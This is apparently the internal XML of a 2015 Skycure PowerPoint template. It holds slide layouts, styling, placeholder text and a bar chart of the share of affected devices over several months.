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1" r:id="rId1"/>
    <p:sldMasterId id="2147483686" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId31"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId32"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="283" r:id="rId3"/>
    <p:sldId id="284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6580"/>
    <a:srgbClr val="FF8B1D"/>
    <a:srgbClr val="41C2EC"/>
    <a:srgbClr val="32C0E7"/>
    <a:srgbClr val="3BA2CC"/>
    <a:srgbClr val="FCFBF7"/>
    <a:srgbClr val="FFEEF8"/>
    <a:srgbClr val="00B8FF"/>
    <a:srgbClr val="038ED3"/>
    <a:srgbClr val="355E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22" autoAdjust="0"/>
    <p:restoredTop sz="98773" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="165" d="100"/>
          <a:sy n="165" d="100"/>
        </p:scale>
        <p:origin x="1650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37" d="100"/>
          <a:sy n="37" d="100"/>
        </p:scale>
        <p:origin x="2226" y="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/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Affected Devices Over Time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0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1 Month</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2 Months</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3 Months</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>4 Months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</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.25</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.38</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.43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0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1 Month</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2 Months</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3 Months</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>4 Months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0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.23</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.35</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.41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67"/>
        <c:overlap val="-43"/>
        <c:axId val="119523680"/>
        <c:axId val="119511168"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="11952368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19511168"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="119511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% affected devices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19523680"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
        <c:majorUnit val="0.1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en-US"/>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="zero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>
          <a:latin typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr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AD0EC7-DD4B-3C48-BA99-3A891FE1C67E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/18/2015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5816AE-3F14-A346-B400-173104E5E3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61802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9BA4B8-6434-9E4E-8CA6-AEAFF5021FA2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/18/2015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14542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680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ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA717289-F3D7-1A42-B7E5-AFDA1313D4AA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120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3050" y="4291013"/>
            <a:ext cx="6311900" cy="4116387"/>
          </a:xfrm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67882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ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA717289-F3D7-1A42-B7E5-AFDA1313D4AA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120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3050" y="4291013"/>
            <a:ext cx="6311900" cy="4116387"/>
          </a:xfrm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17849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ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D17B6DCD-C1AD-8348-B251-2E4EC3D13031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12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25094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ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B9910C6F-941E-8E42-9BF9-4C4526DB2291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13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507430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57200" y="3289905"/>
            <a:ext cx="8229600" cy="895047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defRPr sz="4800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit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6096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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6139221"/>
            <a:ext cx="4401574" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name / Position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5243870" y="6139221"/>
            <a:ext cx="3442929" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Month / Year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096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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17850" y="1371902"/>
            <a:ext cx="2654300" cy="678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580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4176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7358"/>
            <a:ext cx="8229600" cy="970280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular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3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/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Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Ligh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0" y="0"/>
            <a:ext cx="9144000" cy="14176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53760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14176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457200" y="1940878"/>
            <a:ext cx="3697288" cy="38496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" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337368" y="1940878"/>
            <a:ext cx="4349432" cy="3849687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/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Lato Light"/>
                <a:cs typeface="Lato Ligh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buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second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447358"/>
            <a:ext cx="8229600" cy="970280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular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14176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933720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1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57200" y="2556490"/>
            <a:ext cx="8229600" cy="2179381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defRPr sz="4800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit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6096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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17850" y="1371902"/>
            <a:ext cx="2654300" cy="678364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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6139221"/>
            <a:ext cx="4401574" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name / Position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5243870" y="6139221"/>
            <a:ext cx="3442929" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Month / Year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62548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64132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2 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14176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457200" y="1940878"/>
            <a:ext cx="3697288" cy="38496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" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337368" y="1940878"/>
            <a:ext cx="4349432" cy="3849687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/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Lato Light"/>
                <a:cs typeface="Lato Ligh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buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second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447358"/>
            <a:ext cx="8229600" cy="970280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular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40930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6096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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457200" y="6268100"/>
            <a:ext cx="5442754" cy="325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1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t>© 2015 Skycure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FCFBF7"/>
              </a:solidFill>
              <a:latin typeface="Lato Light"/>
              <a:cs typeface="Lato Light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457200" y="2556490"/>
            <a:ext cx="8229600" cy="2179381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defRPr sz="3200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sub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94625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57200" y="2556490"/>
            <a:ext cx="8229600" cy="2179381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defRPr sz="4800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit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096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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17850" y="1371902"/>
            <a:ext cx="2654300" cy="678364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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6139221"/>
            <a:ext cx="4401574" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name / Position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5243870" y="6139221"/>
            <a:ext cx="3442929" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Month / Year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3817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14176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457200" y="1940878"/>
            <a:ext cx="3697288" cy="38496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" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337368" y="1940878"/>
            <a:ext cx="4349432" cy="3849687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
